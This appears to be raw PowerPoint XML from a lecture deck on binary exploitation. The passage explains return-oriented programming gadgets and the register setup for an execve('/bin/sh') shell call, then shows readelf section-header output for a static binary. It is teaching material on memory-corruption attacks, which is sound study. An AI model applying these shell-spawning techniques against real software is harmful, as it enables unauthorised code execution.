              <a:t>We need to find gadgets in the binary that will perform different actions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Essentially encode our shellcode into these gadgets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What do we need to call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (just as we did with shellcode)?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>0xb in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&amp; of "/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>" in %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&amp; [&amp; of "/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>", NULL] in %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ecx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NULL in %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>edx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Where to put "/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>" ?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FCFB7E3C-6220-8942-988C-3F6E25750AD7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>171</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="506981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610" y="63610"/>
            <a:ext cx="8961120" cy="6657867"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="47500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>readelf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>a.out</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>There</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>are</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 31 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>section</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>headers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>starting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>at</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>offset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 0xa20f8:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Section</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Headers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>: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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Nr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Off</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>   ES </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Flg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Lk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Inf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Al</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>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[ 0]                   NULL            00000000 000000 000000 00      0   0  0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[ 1] .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>note.ABI-tag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>     NOTE            080480f4 0000f4 000020 00   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>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[ 2] .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>note.gnu.build-i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> NOTE            08048114 000114 000024 00   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>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[ 3] .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>rel.plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>          REL             08048138 000138 000070 08   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  0   5  4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[ 4] .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>init</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>             PROGBITS        080481a8 0001a8 000023 00  AX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[ 5] .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>              PROGBITS        080481d0 0001d0 0000e0 00  AX  0   0 16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[ 6] .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>             PROGBITS        080482b0 0002b0 075b04 00  AX  0   0 16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[ 7] __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>libc_freeres_fn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> PROGBITS        080bddc0 075dc0 000b36 00  AX  0   0 16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[ 8] __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>libc_thread_fre</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> PROGBITS        080be900 076900 000076 00  AX  0   0 16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[ 9] .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>fini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>             PROGBITS        080be978 076978 000014 00  AX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[10] .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>rodata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>           PROGBITS        080be9a0 0769a0 01bf90 00   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  0   0 32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[11] __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>libc_subfreeres</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> PROGBITS        080da930 092930 00002c 00   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>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[12] __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>libc_atexit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>     PROGBITS        080da95c 09295c 000004 00   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>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[13] __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>libc_thread_sub</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> PROGBITS        080da960 092960 000004 00   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>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[14] .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eh_frame</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>         PROGBITS        080da964 092964 00e108 00   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>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[15] .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gcc_except_table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> PROGBITS        080e8a6c 0a0a6c 0000a3 00   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
